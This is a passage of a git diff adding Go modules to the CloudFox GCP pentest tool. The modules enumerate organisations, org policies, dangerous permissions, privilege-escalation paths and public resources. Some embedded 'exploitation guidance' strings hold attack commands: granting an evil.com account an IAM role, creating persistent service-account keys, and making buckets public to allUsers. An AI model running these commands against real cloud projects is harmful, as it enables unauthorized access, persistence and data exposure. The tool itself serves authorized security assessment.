Generated by CloudFox\n\n", + } + m.LootMap["org-all-projects"] = &internal.LootFile{ + Name: "org-all-projects", + Contents: "", + } + m.LootMap["org-gcloud-commands"] = &internal.LootFile{ + Name: "org-gcloud-commands", + Contents: "# Organization Enumeration Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *OrganizationsModule) generateLoot() { + // All project IDs + for _, proj := range m.Projects { + m.LootMap["org-all-projects"].Contents += proj.ProjectID + "\n" + } + + // Hierarchy visualization + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["org-hierarchy"].Contents += fmt.Sprintf("Organization: %s (%s)\n", org.DisplayName, orgID) + + // Find folders directly under this org + for _, folder := range m.Folders { + if folder.Parent == org.Name { + m.addFolderToHierarchy(folder, 1) + } + } + + // Find projects directly under this org + for _, proj := range m.Projects { + if proj.Parent == org.Name { + m.LootMap["org-hierarchy"].Contents += fmt.Sprintf(" └── Project: %s (%s)\n", proj.DisplayName, proj.ProjectID) + } + } + m.LootMap["org-hierarchy"].Contents += "\n" + } + + // Gcloud commands + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["org-gcloud-commands"].Contents += fmt.Sprintf( + "# Organization: %s\n"+ + "gcloud organizations describe %s\n"+ + "gcloud organizations get-iam-policy %s\n"+ + "gcloud resource-manager folders list --organization=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + org.DisplayName, + orgID, + orgID, + orgID, + orgID, + ) + } + + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["org-gcloud-commands"].Contents += fmt.Sprintf( + "# Folder: %s\n"+ + "gcloud resource-manager folders describe %s\n"+ + "gcloud resource-manager folders get-iam-policy %s\n\n", + folder.DisplayName, + folderID, + folderID, + ) + } +} + +func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo, depth int) { + indent := strings.Repeat(" ", depth) + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["org-hierarchy"].Contents += fmt.Sprintf("%s├── Folder: %s (%s)\n", indent, folder.DisplayName, folderID) + + // Find child folders + for _, childFolder := range m.Folders { + if childFolder.Parent == folder.Name { + m.addFolderToHierarchy(childFolder, depth+1) + } + } + + // Find projects under this folder + for _, proj := range m.Projects { + if proj.Parent == folder.Name { + m.LootMap["org-hierarchy"].Contents += fmt.Sprintf("%s └── Project: %s (%s)\n", indent, proj.DisplayName, proj.ProjectID) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Organizations table + orgsHeader := []string{ + "Organization ID", + "Display Name", + "State", + "Directory ID", + } + + var orgsBody [][]string + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgsBody = append(orgsBody, []string{ + orgID, + org.DisplayName, + org.State, + org.DirectoryID, + }) + } + + // Folders table + foldersHeader := []string{ + "Folder ID", + "Display Name", + "Parent", + "State", + } + + var foldersBody [][]string + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + foldersBody = append(foldersBody, []string{ + folderID, + folder.DisplayName, + folder.Parent, + folder.State, + }) + } + + // Projects table + projectsHeader := []string{ + "Project ID", + "Display Name", + "Parent", + "State", + } + + var projectsBody [][]string + for _, proj := range m.Projects { + projectsBody = append(projectsBody, []string{ + proj.ProjectID, + proj.DisplayName, + proj.Parent, + proj.State, + }) + } + + // Ancestry table + ancestryHeader := []string{ + "Project", + "Ancestry Path", + } + + var ancestryBody [][]string + for _, ancestry := range m.Ancestry { + if len(ancestry) > 0 { + // Build ancestry path string + var path []string + projectID := "" + for _, node := range ancestry { + if node.Type == "project" { + projectID = node.ID + } + path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) + } + ancestryBody = append(ancestryBody, []string{ + projectID, + strings.Join(path, " -> "), + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(orgsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "organizations", + Header: orgsHeader, + Body: orgsBody, + }) + } + + if len(foldersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "folders", + Header: foldersHeader, + Body: foldersBody, + }) + } + + if len(projectsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "projects", + Header: projectsHeader, + Body: projectsBody, + }) + } + + if len(ancestryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "ancestry", + Header: ancestryHeader, + Body: ancestryBody, + }) + } + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go new file mode 100644 index 00000000..6a7f2ac2 --- /dev/null +++ b/gcp/commands/orgpolicies.go @@ -0,0 +1,325 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrgPoliciesCommand = &cobra.Command{ + Use: globals.GCP_ORGPOLICIES_MODULE_NAME, + Aliases: []string{"orgpolicy", "policies"}, + Short: "Enumerate organization policies and identify security weaknesses", + Long: `Enumerate GCP organization policies to identify security configuration weaknesses. + +Organization policies control security constraints across GCP resources. This module +identifies policies that may be misconfigured or weakened, creating security risks. + +Security-Relevant Policies Analyzed: +- Domain restrictions (iam.allowedPolicyMemberDomains) +- Service account key controls (iam.disableServiceAccountKeyCreation) +- Workload identity restrictions +- Compute security (Shielded VM, OS Login, external IPs) +- Storage security (public access, uniform access) +- SQL security (public IPs, authorized networks) +- GKE security (public endpoints) +- Resource location restrictions + +Risk Indicators: +- AllowAll: Policy allows any value (HIGH risk) +- Wildcard patterns: Overly permissive allowed values +- Unenforced: Security constraint not enabled +- Override: Project overrides parent restrictions`, + Run: runGCPOrgPoliciesCommand, +} + +type OrgPoliciesModule struct { + gcpinternal.BaseGCPModule + Policies []orgpolicyservice.OrgPolicyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type OrgPoliciesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrgPoliciesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrgPoliciesOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPOrgPoliciesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGPOLICIES_MODULE_NAME) + if err != nil { + return + } + + module := &OrgPoliciesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Policies: []orgpolicyservice.OrgPolicyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ORGPOLICIES_MODULE_NAME, m.processProject) + + if len(m.Policies) == 0 { + logger.InfoM("No organization policies found (may require orgpolicy.policies.list permission)", globals.GCP_ORGPOLICIES_MODULE_NAME) + return + } + + // Count by risk level + highCount := 0 + mediumCount := 0 + for _, policy := range m.Policies { + switch policy.RiskLevel { + case "HIGH": + highCount++ + case "MEDIUM": + mediumCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies) (%d HIGH, %d MEDIUM risk)", + len(m.Policies), highCount, mediumCount), globals.GCP_ORGPOLICIES_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating org policies in project: %s", projectID), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + + svc := orgpolicyservice.New() + policies, err := svc.ListProjectPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating org policies in project %s: %v", projectID, err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Policies = append(m.Policies, policies...) + for _, policy := range policies { + m.addPolicyToLoot(policy) + } + m.mu.Unlock() +} + +func (m *OrgPoliciesModule) initializeLootFiles() { + m.LootMap["orgpolicies-all"] = &internal.LootFile{ + Name: "orgpolicies-all", + Contents: "# GCP Organization Policies\n# Generated by CloudFox\n\n", + } + m.LootMap["orgpolicies-weak"] = &internal.LootFile{ + Name: "orgpolicies-weak", + Contents: "# GCP Weak/Misconfigured Organization Policies\n# Generated by CloudFox\n# These policies may weaken security posture\n\n", + } + m.LootMap["orgpolicies-exploitation"] = &internal.LootFile{ + Name: "orgpolicies-exploitation", + Contents: "# GCP Organization Policy Exploitation Opportunities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInfo) { + // All policies + m.LootMap["orgpolicies-all"].Contents += fmt.Sprintf( + "## Constraint: %s\n"+ + "## Project: %s\n"+ + "## Enforced: %v\n"+ + "## AllowAll: %v, DenyAll: %v\n"+ + "## Inherit: %v\n"+ + "## Risk: %s\n", + policy.Constraint, + policy.ProjectID, + policy.Enforced, + policy.AllowAll, policy.DenyAll, + policy.InheritParent, + policy.RiskLevel, + ) + if len(policy.AllowedValues) > 0 { + m.LootMap["orgpolicies-all"].Contents += fmt.Sprintf("## Allowed: %s\n", strings.Join(policy.AllowedValues, ", ")) + } + if len(policy.DeniedValues) > 0 { + m.LootMap["orgpolicies-all"].Contents += fmt.Sprintf("## Denied: %s\n", strings.Join(policy.DeniedValues, ", ")) + } + m.LootMap["orgpolicies-all"].Contents += "\n" + + // Weak policies + if policy.RiskLevel == "HIGH" || policy.RiskLevel == "MEDIUM" { + m.LootMap["orgpolicies-weak"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s\n"+ + "## Security Impact: %s\n", + policy.RiskLevel, policy.Constraint, + policy.ProjectID, + policy.SecurityImpact, + ) + if len(policy.RiskReasons) > 0 { + m.LootMap["orgpolicies-weak"].Contents += "## Reasons:\n" + for _, reason := range policy.RiskReasons { + m.LootMap["orgpolicies-weak"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + m.LootMap["orgpolicies-weak"].Contents += "\n" + + // Add exploitation guidance for high-risk policies + if policy.RiskLevel == "HIGH" { + m.LootMap["orgpolicies-exploitation"].Contents += fmt.Sprintf( + "## [%s] %s (Project: %s)\n"+ + "## Impact: %s\n", + policy.RiskLevel, policy.Constraint, policy.ProjectID, + policy.SecurityImpact, + ) + m.LootMap["orgpolicies-exploitation"].Contents += m.getExploitationGuidance(policy) + m.LootMap["orgpolicies-exploitation"].Contents += "\n" + } + } +} + +func (m *OrgPoliciesModule) getExploitationGuidance(policy orgpolicyservice.OrgPolicyInfo) string { + switch { + case strings.Contains(policy.Constraint, "iam.allowedPolicyMemberDomains"): + return "## Exploitation: Can add external users/SAs to IAM policies\n" + + "# gcloud projects add-iam-policy-binding " + policy.ProjectID + " --member=user:external@evil.com --role=roles/viewer\n" + case strings.Contains(policy.Constraint, "iam.disableServiceAccountKeyCreation"): + return "## Exploitation: Can create persistent SA keys\n" + + "# gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL\n" + case strings.Contains(policy.Constraint, "compute.vmExternalIpAccess"): + return "## Exploitation: Can create VMs with external IPs\n" + + "# VMs can be created with public internet access\n" + case strings.Contains(policy.Constraint, "storage.publicAccessPrevention"): + return "## Exploitation: Can make buckets/objects public\n" + + "# gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME\n" + case strings.Contains(policy.Constraint, "sql.restrictPublicIp"): + return "## Exploitation: Can create Cloud SQL with public IP\n" + + "# Database may be accessible from internet\n" + case strings.Contains(policy.Constraint, "workloadIdentityPoolProviders"): + return "## Exploitation: Can configure external identity providers\n" + + "# External identities can assume GCP service account permissions\n" + default: + return "## Check constraint documentation for exploitation paths\n" + } +} + +func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main policies table + header := []string{ + "Constraint", + "Risk", + "Enforced", + "AllowAll", + "DenyAll", + "Inherit", + "Security Impact", + "Project", + } + + var body [][]string + for _, policy := range m.Policies { + impact := policy.SecurityImpact + if len(impact) > 50 { + impact = impact[:50] + "..." + } + + body = append(body, []string{ + policy.Constraint, + policy.RiskLevel, + orgPolicyBoolToYesNo(policy.Enforced), + orgPolicyBoolToYesNo(policy.AllowAll), + orgPolicyBoolToYesNo(policy.DenyAll), + orgPolicyBoolToYesNo(policy.InheritParent), + impact, + policy.ProjectID, + }) + } + + // Weak policies table + weakHeader := []string{ + "Risk", + "Constraint", + "Project", + "Security Impact", + "Reasons", + } + + var weakBody [][]string + for _, policy := range m.Policies { + if policy.RiskLevel == "HIGH" || policy.RiskLevel == "MEDIUM" { + reasons := strings.Join(policy.RiskReasons, "; ") + if len(reasons) > 60 { + reasons = reasons[:60] + "..." + } + + weakBody = append(weakBody, []string{ + policy.RiskLevel, + policy.Constraint, + policy.ProjectID, + policy.SecurityImpact, + reasons, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "orgpolicies", + Header: header, + Body: body, + }, + } + + if len(weakBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "orgpolicies-weak", + Header: weakHeader, + Body: weakBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d weak/misconfigured organization policies!", len(weakBody)), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + + output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} + +func orgPolicyBoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" +} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index 2bb4fb0b..7132fc46 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -8,6 +8,7 @@ import ( "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -232,6 +233,15 @@ func (m *PermissionsModule) initializeLootFiles() { Name: "groups-unenumerated", Contents: "# GCP Groups - Membership NOT Enumerated (BLINDSPOT)\n# Generated by CloudFox\n# These groups have IAM permissions but membership could not be enumerated\n# Members of these groups inherit permissions that are NOT visible in other output\n# Requires Cloud Identity API access to enumerate\n\n", } + // Pentest-focused loot files + m.LootMap["permissions-dangerous"] = &internal.LootFile{ + Name: "permissions-dangerous", + Contents: "# GCP Dangerous Permissions (Privesc Risk)\n# Generated by CloudFox\n# These permissions can lead to privilege escalation\n\n", + } + m.LootMap["permissions-dangerous-by-category"] = &internal.LootFile{ + Name: "permissions-dangerous-by-category", + Contents: "# GCP Dangerous Permissions by Category\n# Generated by CloudFox\n\n", + } } func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { @@ -289,6 +299,31 @@ func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { ) } + // Dangerous permissions with detailed categorization + if dpInfo := getDangerousPermissionInfo(perm.Permission); dpInfo != nil { + m.LootMap["permissions-dangerous"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Entity: %s (%s)\n"+ + "## Permission: %s\n"+ + "## Category: %s\n"+ + "## Description: %s\n"+ + "## Role: %s\n"+ + "## Project: %s%s%s\n\n", + dpInfo.RiskLevel, dpInfo.Category, + ep.Email, ep.EntityType, + dpInfo.Permission, + dpInfo.Category, + dpInfo.Description, + perm.Role, + perm.ResourceID, inherited, condition, + ) + + m.LootMap["permissions-dangerous-by-category"].Contents += fmt.Sprintf( + "[%s] %s | %s | %s | %s | %s\n", + dpInfo.RiskLevel, dpInfo.Category, ep.Email, dpInfo.Permission, dpInfo.Description, perm.ResourceID, + ) + } + // Inherited permissions if perm.IsInherited { m.LootMap["permissions-inherited"].Contents += fmt.Sprintf( @@ -375,6 +410,30 @@ func isHighPrivilegePermission(permission string) bool { return false } +// DangerousPermissionInfo contains detailed info about a dangerous permission +type DangerousPermissionInfo struct { + Permission string + Category string + RiskLevel string + Description string +} + +// getDangerousPermissionInfo returns detailed info if permission is dangerous, nil otherwise +func getDangerousPermissionInfo(permission string) *DangerousPermissionInfo { + dangerousPerms := privescservice.GetDangerousPermissions() + for _, dp := range dangerousPerms { + if permission == dp.Permission { + return &DangerousPermissionInfo{ + Permission: dp.Permission, + Category: dp.Category, + RiskLevel: dp.RiskLevel, + Description: dp.Description, + } + } + } + return nil +} + // ------------------------------ // Output Generation // ------------------------------ @@ -506,6 +565,40 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log } } + // Dangerous permissions table with categories (pentest-focused) + dangerousHeader := []string{ + "Risk", + "Category", + "Entity", + "Type", + "Permission", + "Description", + "Role", + "Project", + } + + var dangerousBody [][]string + criticalCount := 0 + for _, ep := range m.EntityPermissions { + for _, perm := range ep.Permissions { + if dpInfo := getDangerousPermissionInfo(perm.Permission); dpInfo != nil { + dangerousBody = append(dangerousBody, []string{ + dpInfo.RiskLevel, + dpInfo.Category, + ep.Email, + ep.EntityType, + dpInfo.Permission, + dpInfo.Description, + perm.Role, + perm.ResourceID, + }) + if dpInfo.RiskLevel == "CRITICAL" { + criticalCount++ + } + } + } + } + // Group membership table groupHeader := []string{ "Group Email", @@ -590,6 +683,16 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log logger.InfoM(fmt.Sprintf("[FINDING] Found %d entity(ies) with high-privilege permissions!", highPrivEntities), globals.GCP_PERMISSIONS_MODULE_NAME) } + // Add dangerous permissions table (pentest-focused) + if len(dangerousBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-dangerous", + Header: dangerousHeader, + Body: dangerousBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d dangerous permission(s) (%d CRITICAL) - privesc risk!", len(dangerousBody), criticalCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + // Add detailed table (can be large) if len(detailBody) > 0 { tables = append(tables, internal.TableFile{ diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go new file mode 100644 index 00000000..444cdd3e --- /dev/null +++ b/gcp/commands/privesc.go @@ -0,0 +1,332 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivescCommand = &cobra.Command{ + Use: globals.GCP_PRIVESC_MODULE_NAME, + Aliases: []string{"pe", "escalate", "priv"}, + Short: "Identify privilege escalation paths in GCP projects", + Long: `Analyze GCP IAM policies to identify privilege escalation opportunities. + +This module examines IAM bindings to find principals with dangerous permissions +that could be used to escalate privileges within the GCP environment. + +Detected privilege escalation methods include: +- Service Account Token Creation (iam.serviceAccounts.getAccessToken) +- Service Account Key Creation (iam.serviceAccountKeys.create) +- Project/Folder/Org IAM Policy Modification +- Compute Instance Metadata Injection (SSH keys, startup scripts) +- Cloud Functions/Run Deployment with SA Identity +- Cloud Build SA Abuse +- GKE Cluster Access +- Secret Manager Access +- Signed URL/JWT Generation + +Risk Levels: +- CRITICAL: Direct path to project/org compromise +- HIGH: Can escalate to privileged service account +- MEDIUM: Can access sensitive resources`, + Run: runGCPPrivescCommand, +} + +type PrivescModule struct { + gcpinternal.BaseGCPModule + Paths []privescservice.PrivescPath + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type PrivescOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivescOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivescOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPPrivescCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PRIVESC_MODULE_NAME) + if err != nil { + return + } + + module := &PrivescModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Paths: []privescservice.PrivescPath{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PRIVESC_MODULE_NAME, m.processProject) + + if len(m.Paths) == 0 { + logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, path := range m.Paths { + switch path.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s) (%d CRITICAL, %d HIGH)", + len(m.Paths), criticalCount, highCount), globals.GCP_PRIVESC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *PrivescModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing privilege escalation in project: %s", projectID), globals.GCP_PRIVESC_MODULE_NAME) + } + + svc := privescservice.New() + paths, err := svc.AnalyzeProjectPrivesc(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error analyzing project %s: %v", projectID, err), globals.GCP_PRIVESC_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Paths = append(m.Paths, paths...) + for _, path := range paths { + m.addPathToLoot(path) + } + m.mu.Unlock() +} + +func (m *PrivescModule) initializeLootFiles() { + m.LootMap["privesc-paths"] = &internal.LootFile{ + Name: "privesc-paths", + Contents: "# GCP Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["privesc-commands"] = &internal.LootFile{ + Name: "privesc-commands", + Contents: "# GCP Privilege Escalation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["privesc-critical"] = &internal.LootFile{ + Name: "privesc-critical", + Contents: "# CRITICAL Privilege Escalation Paths\n# Generated by CloudFox\n# These require immediate attention\n\n", + } + m.LootMap["privesc-principals"] = &internal.LootFile{ + Name: "privesc-principals", + Contents: "", + } +} + +func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { + // All paths + m.LootMap["privesc-paths"].Contents += fmt.Sprintf( + "## %s - %s\n"+ + "## Principal: %s (%s)\n"+ + "## Target: %s\n"+ + "## Risk: %s\n"+ + "## Permissions: %s\n"+ + "## Description: %s\n\n", + path.Method, path.ProjectID, + path.Principal, path.PrincipalType, + path.TargetResource, + path.RiskLevel, + strings.Join(path.Permissions, ", "), + path.Description, + ) + + // Commands + m.LootMap["privesc-commands"].Contents += fmt.Sprintf( + "# %s - %s\n"+ + "# Principal: %s\n"+ + "# Risk: %s\n"+ + "%s\n\n", + path.Method, path.ProjectID, + path.Principal, + path.RiskLevel, + path.ExploitCommand, + ) + + // Critical only + if path.RiskLevel == "CRITICAL" { + m.LootMap["privesc-critical"].Contents += fmt.Sprintf( + "## [CRITICAL] %s\n"+ + "## Principal: %s (%s)\n"+ + "## Project: %s\n"+ + "## Target: %s\n"+ + "## Permissions: %s\n"+ + "## Description: %s\n"+ + "## Exploit:\n"+ + "## %s\n\n", + path.Method, + path.Principal, path.PrincipalType, + path.ProjectID, + path.TargetResource, + strings.Join(path.Permissions, ", "), + path.Description, + path.ExploitCommand, + ) + } + + // Unique principals + m.LootMap["privesc-principals"].Contents += path.Principal + "\n" +} + +func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main privesc table + header := []string{ + "Risk", + "Method", + "Principal", + "Type", + "Target", + "Permissions", + "Project", + } + + var body [][]string + for _, path := range m.Paths { + perms := strings.Join(path.Permissions, ", ") + if len(perms) > 50 { + perms = perms[:50] + "..." + } + + body = append(body, []string{ + path.RiskLevel, + path.Method, + path.Principal, + path.PrincipalType, + path.TargetResource, + perms, + path.ProjectID, + }) + } + + // Critical paths table + critHeader := []string{ + "Method", + "Principal", + "Target", + "Description", + "Exploit Command", + "Project", + } + + var critBody [][]string + for _, path := range m.Paths { + if path.RiskLevel == "CRITICAL" { + cmd := path.ExploitCommand + if len(cmd) > 60 { + cmd = cmd[:60] + "..." + } + + critBody = append(critBody, []string{ + path.Method, + path.Principal, + path.TargetResource, + path.Description, + cmd, + path.ProjectID, + }) + } + } + + // By method summary + methodHeader := []string{ + "Method", + "Count", + "Critical", + "High", + "Medium", + } + + methodCounts := make(map[string]map[string]int) + for _, path := range m.Paths { + if methodCounts[path.Method] == nil { + methodCounts[path.Method] = make(map[string]int) + } + methodCounts[path.Method]["total"]++ + methodCounts[path.Method][path.RiskLevel]++ + } + + var methodBody [][]string + for method, counts := range methodCounts { + methodBody = append(methodBody, []string{ + method, + fmt.Sprintf("%d", counts["total"]), + fmt.Sprintf("%d", counts["CRITICAL"]), + fmt.Sprintf("%d", counts["HIGH"]), + fmt.Sprintf("%d", counts["MEDIUM"]), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "privesc", + Header: header, + Body: body, + }, + } + + if len(critBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "privesc-critical", + Header: critHeader, + Body: critBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL privilege escalation paths!", len(critBody)), globals.GCP_PRIVESC_MODULE_NAME) + } + + if len(methodBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "privesc-summary", + Header: methodHeader, + Body: methodBody, + }) + } + + output := PrivescOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } +} diff --git a/gcp/commands/publicresources.go b/gcp/commands/publicresources.go new file mode 100644 index 00000000..cfacc794 --- /dev/null +++ b/gcp/commands/publicresources.go @@ -0,0 +1,345 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + publicresourcesservice "github.com/BishopFox/cloudfox/gcp/services/publicResourcesService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPublicResourcesCommand = &cobra.Command{ + Use: globals.GCP_PUBLICRESOURCES_MODULE_NAME, + Aliases: []string{"public", "exposed", "internet-facing"}, + Short: "Enumerate all internet-exposed resources", + Long: `Consolidate and enumerate all internet-exposed GCP resources. + +This module provides a single view of your attack surface by identifying +resources accessible from the internet across multiple services. + +Resources Scanned: +- Compute Engine instances with external IPs +- Cloud SQL instances with public IPs +- Cloud Run services with public ingress +- Cloud Functions with allUsers/allAuthenticatedUsers +- GKE clusters with public API endpoints +- Cloud Storage buckets with public access +- External load balancers + +Output: +- Consolidated table of all public resources +- Risk levels (CRITICAL, HIGH, MEDIUM, LOW) +- Access methods and exploitation commands +- Service account associations + +Use this for initial attack surface mapping during engagements.`, + Run: runGCPPublicResourcesCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PublicResourcesModule struct { + gcpinternal.BaseGCPModule + + Resources []publicresourcesservice.PublicResource + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PublicResourcesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PublicResourcesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PublicResourcesOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPublicResourcesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := 